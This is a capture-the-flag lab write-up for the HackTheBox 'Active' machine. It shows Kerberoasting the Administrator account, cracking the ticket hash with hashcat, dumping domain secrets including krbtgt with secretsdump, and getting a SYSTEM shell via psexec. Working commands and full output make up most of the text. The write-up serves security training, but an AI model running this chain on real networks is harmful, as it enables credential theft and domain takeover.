Kerberoasting

During the Bloodhound enumeration, it was discovered that the administator user is kerberoast-able

┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ impacket-getuserspns 'active.htb/svc_tgs:GPPstillStandingStrong2k18' -dc-ip $IP -request -request-user administrator    
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/cifs:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2023-01-31 09:41:33.907718             
 
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$58a5b8df3cab23f48854d9a9f3e4dde2$8b2e96536c12c79b24a31642b2c2a1800c717c01c08e63d23ac7a3eced9f562bff6403140a940cee4a6edb3541da6083bf51a1681222850d86eb5e78ce0f38d6a61df0ad76f76d1976f6689e88d7ac2b1f50f0b8f6e218cabb81436f59d0de89547feea8321e8a7b2052ba934ce96c72b804df04abfff1da053f995a76aebecaf1163f60f5e59e308e74c338a731a06968c8868f88acf1c60e4e49fdabf38a5fd1e1d066f8a038bf3df02f205f70a751459988c7ed9a753f753235cf98346a62ea718a2189115f349e0f0cff2cf35c3659c5be5b7d1058eaecbf70cfbccc8ba326308e46571b81e6f789b2a6cc260bae6c2fe153d9ea72f02ce3d3b4f76d3692cc4396134f7aec2fc99be510445717643b5b5938178d1024a27b31e23061d263524c075ece83005707702a6c51c67e0e24152e6eee5f333b8fce875686fe4484e8dbcd13fb4994f630422fbca6524e064f0daf410987a94980b0b7cf7115bdb0e01d4cbe8ec26e77c3f8eb738a2ab34354ee62966bdbf7b0557c81f0b1945e27b8d6cc4aa7c5fdb45a8334ab4ffbcb482d247eb220e789fbbc2a5e56311c51eccb31e44d0cbf54dfee0a3633c6c16c1f4aadce25194d7df37a386a51009e5eacf62fa75b953c676c8aca3d96a49fff25b626f15a023461bd899f01eb256044fa8fbcc0e361256a524be898901fd0a746ca9e9a4c16747a4afba6389f5c0fe74cb7995504e24fbc5711c8c70a22b9f6d2042c1ded9d0a68fe05bf2275bd24b83c826b0e4e13da3d6da31cc02d72a14d156fa2b362f988594d15bbf3d1f00b1c85753d2b4106572c80231d29e9206398b0b7a90f81929be21dfad3d6a19f200ad9084432483652c9b3a0644cacda0d8ee490d0e00e2c302c74b5e09e81598e20bd50963cfeafb65351d4ea5b7e51afac8ceea68d010ef98dcce532f235aac263576069de3ca2204127c14c3b06f00e3c41e001e1421454e7c78583efb8647251729f07757c5b619260f4be4921f975753f961cd5aa65492249fd1f528b45408c67035a766b3a9dbf6684f630c90effbb6faf43d154f566a91d12271a5581a0ffdd580afd347ab22315614254731cacd28c82da2056f0dac416938fc4c1d55d16b871018b4fd1daf176b0910a2dd20f46c882e5ec52ff75a1fca2563fd4a969be0d3130e15f4741f11105bc25cb0c85f43267f15405cffb82bf3f79f2e63c7aa6005239408c55c3a73fb89a264bd00a85142748be1c70aa49bf307a

the administrator user has an spn configured, active/cifs:445

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ hashcat -a 0 -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5134df72748f3830097c753f7039c3fb$a4a0d1cea9ba6d4083cb239cf0ddac7d9236799a3eb9bfe5785a5aa3b37f609ce82e512ff8290c865a781f44d5940886e85b2e09c3329beaeb568d1a97dbdc9891df8cc99ebfd6064caff8e8d190d4055d121c69671dcd7639e999b70357175b822e11e4510c4469ad408268b183dc001a7aa0adae737a3fbc176913feadd622dbd10b5d29136e1d501b03d2530de0ea7f97d87fe0aa34e88496d2124fedc5dc966f508b4ae72c675b582d9ddfb5317d1f82b0c7e6b21d3467b329b39e02185f57e10a4ee8f19e81e88b8b878e86de6809684deee826311e271b2f3d04f28e90ffcddf21180fa58c2e713e04ae3a0c3284dce0b3beb354932b8f869e5dc15ec3550e696467306af201137a1cb558401a3b98108abea0f8dcf6dd50f557708f4876104da4d36e2d9efad0a286b2ec4df0c1b09dd0fb66b13695b0db3e0681e806e9c13ad1ba4d0b926987c12e487c9b72cdcbd24ee9156334c97190267ded5bed495342fa49f86824ec3b3c702b443eb9a3e2cda47d384f9094c0d7a6497db9a1dfd27ef8502fd187298ded2040c0345bdf9723a163206554bc6d6f9e2df9c1f057d5eb3f54919d3927d399d3d989fc03cded34a0e53b0ac8e215f59d2dd038d6aa2979ad00477cb6de6a8a29dc340e9706c9941cfb75d4d277ab3e2f3562d96380f892ce223d77c4edc82574ad1ca7ee48f7c8db9e7889978d816ee114891369f041a0ff278904ee5026bf66ee5dad6ef4c2102472d5526f2e6f1522e115097dbb79194c69c5e5b9765994b6ae1f2098c4d215fe67bf1918f6effad28f166005371696ebfd7e91bfaf33ce97f8538b9033c30893f85605ac9d4086978a833d8fadf8519c0b077aa12d2312088de0690bb0975ef4085b32d12a86fabed6f072ceccb853e45ed9546c12641b786242576f86add9af0d2f3d3125670f48a8c3cfa3dd5d7a7b042774ff1a850f0fed34c73db70821f30b3033d36545137b3be95333d4a086af2ceadd181f9b79c36bd12bc3889ffed4a64d9e95c1a37a5f3e9355f681e01332dea3619a4cbb6059d77a05edc5edf5478dde1731483e2f42021a742ad6d04d029705c2e4d98d5707efcd798af85001dd189de7ea9fc27b385a33bbabc734e6ceeaa70faceeef0fcd41ddf580b9782a236fa920bdbd45301981bcf6d43c3f77247533589223e012736b7d13c2bd74b636bb2a5b0ef2b9881a26c898a8b5482f11a848b97698dd6788c926cffdd9744158b3ccb35e8d0f:Ticketmaster1968
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...5e8d0f
Time.Started.....: Tue Jan 31 11:59:53 2023 (10 secs)
Time.Estimated...: Tue Jan 31 12:00:03 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   971.4 kH/s (0.44ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10537728/14344385 (73.46%)
Rejected.........: 0/10537728 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Ti2009
Hardware.Mon.#1..: Util: 68%
 
Started: Tue Jan 31 11:59:39 2023
Stopped: Tue Jan 31 12:00:03 2023

Hashcat cracked the TGS hash. It’s Ticketmaster1968

Since that’s the administrator user, there is not much else to do. It’s GG

Hashdump

┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ impacket-secretsdump 'active.htb/administrator:Ticketmaster1968@dc.active.htb' -target-ip $IP -dc-ip $IP -outputfile hashdump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] target system bootkey: 0xff954ee81ffb63937b563f523caf1d59
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:5c15eb37006fb74c21a5d1e2144b726e:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
active\dc$:aes256-cts-hmac-sha1-96:e81113c5927d93eb12be8c4db6294a2c3e11fe6fa3835bb549392cfb3f5c2e62
active\dc$:aes128-cts-hmac-sha1-96:bd891bc22b7b51aa5ee82f7cdf832960
active\dc$:des-cbc-md5:f74689ab6bcbcd9b
active\dc$:plain_password_hex:a96872372de6af7462f8de5262d671df7f0dc875cd5f9fe2fd405cf042403daff44cd9948be48d00231e24655dad7e2bdcacf73c9f6e849c2c90ad4052738a78eb61684475c3b5d27304c8c48726ae5101e4d355b9e842fabee7e9dd4a2842b429d80ce1d2a4114c7160d25818d4acae3b14a1bf1ee381046b7a10c69a087dbd788b37bf8a35203870e415bbf94512b2a1ed998a65fb7768dd3320237420457c86d15f38d3c9052c418c7ce5294a1babed3b6f9032897118197d7caaa1472f00bbcc3af9f8da22934d504b88b8103f23201aa446e67cfd4178fd9c2ec4bafe22d92c347baa6edb180e10b763c0af2e2d
active\dc$:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] DefaultPassword 
(unknown user):ROOT#123
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x377bd35be67705f345dabf00d3181e269e0fb1e6
dpapi_userkey:0x7586c391e559565c85cb342d1d24546381f0d5cb
[*] NL$KM 
 0000   CC 6F B8 46 C3 0C 58 05  2F F2 07 2E DA E6 BF 7D   .o.F..X./......}
 0010   60 63 F6 89 E7 0E D5 D5  22 EE 54 DA 63 12 5B B5   `c......".T.c.[.
 0020   D8 DA 0B B7 82 0E 3D E1  9D 7A 03 15 08 5C B0 AE   ......=..z...\..
 0030   EF 63 91 B9 6C 87 65 A8  14 62 95 BC 77 69 77 08   .c..l.e..b..wiw.
nl$km:cc6fb846c30c58052ff2072edae6bf7d6063f689e70ed5d522ee54da63125bb5d8da0bb7820e3de19d7a0315085cb0aeef6391b96c8765a8146295bc77697708
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
active.htb\svc_tgs:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
dc$:1000:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
administrator:des-cbc-md5:5891549b31f2c294
krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
krbtgt:des-cbc-md5:9d044f891adf7629
active.htb\svc_tgs:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
active.htb\svc_tgs:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
active.htb\svc_tgs:des-cbc-md5:d6c7eca70862f1d0
dc$:aes256-cts-hmac-sha1-96:e81113c5927d93eb12be8c4db6294a2c3e11fe6fa3835bb549392cfb3f5c2e62
dc$:aes128-cts-hmac-sha1-96:bd891bc22b7b51aa5ee82f7cdf832960
dc$:des-cbc-md5:980810f257a170c4
[*] Cleaning up...

Domain Level Compromise

impacket-psexec

┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ impacket-psexec 'active.htb/administrator:Ticketmaster1968@dc.active.htb' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file oCaCIhEr.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service ZSyS on 10.10.10.100.....
[*] Starting service ZSyS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
operable program or batch file.
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::91dd:26f0:4484:75bc
   Link-local IPv6 Address . . . . . : fe80::91dd:26f0:4484:75bc%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
 
Tunnel adapter isatap.{73A3C9B3-56C9-47B6-9326-5C0FFB1A8451}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Domain Level Compromise

InfoSec LAB

Explorer

Active_Kerberoasting

Kerberoasting

Password Cracking

Hashdump

impacket-psexec

Interactive Graph View

Table of Contents

Backlinks